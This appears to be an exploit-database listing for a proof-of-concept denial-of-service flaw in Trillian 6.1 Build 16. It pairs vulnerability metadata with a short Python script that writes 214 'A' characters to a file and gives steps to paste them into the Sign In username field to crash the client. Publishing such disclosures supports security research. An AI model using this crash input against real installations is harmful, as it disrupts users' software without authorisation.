header-logo
Suggest Exploit
vendor:
Trillian
by:
Jose Miguel Gonzalez
7.8
CVSS
HIGH
Denial of Service
N/A
CWE
Product Name: Trillian
Affected Version From: 6.1 Build 16
Affected Version To: 6.1 Build 16
Patch Exists: NO
Related CWE: N/A
CPE: a:cerulean_studios:trillian:6.1
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Single Language x64
2018

Trillian 6.1 Build 16 – ‘Sign In’ Denial of Service (PoC)

A denial of service vulnerability exists in Trillian 6.1 Build 16 when a maliciously crafted username is used in the 'Sign In' process. An attacker can exploit this vulnerability by running the python code 'trillian.py', copying the context of 'trillian.txt' to the clipboard, pasting the clipboard on the 'Username' field, entering '1234' on the 'Password' field, and then clicking 'Sign In'. This will cause the application to crash.

Mitigation:

N/A
Source

Exploit-DB raw data:

#Exploit Title: Trillian 6.1 Build 16 - "Sign In" Denial of service (PoC)
#Discovery by: Jose Miguel Gonzalez
#Discovery Date; 2018-08-29
#Vendor Homepage: https://www.trillian.im/
#Software Link: https://www.trillian.im/download/
#Tested Version: 6.1 Build 16
#Tested on OS: Windows 10 Single Language x64

#Steps to produce the crash
#1.- Run the python code: trillian.py
#2.- Open trillian.txt and copy context to clipboard
#3.- Open Trillian application
#4.- Paste clipboard on "Username"
#5.- Put "1234" on "Password"
#5.- Sign In
#6.- Crashed

mem = "\x41" * 214
f = open ("trillian.txt", "w")
f.write(mem)
f.close()

Navigation

Suggest Exploit

Services By CQR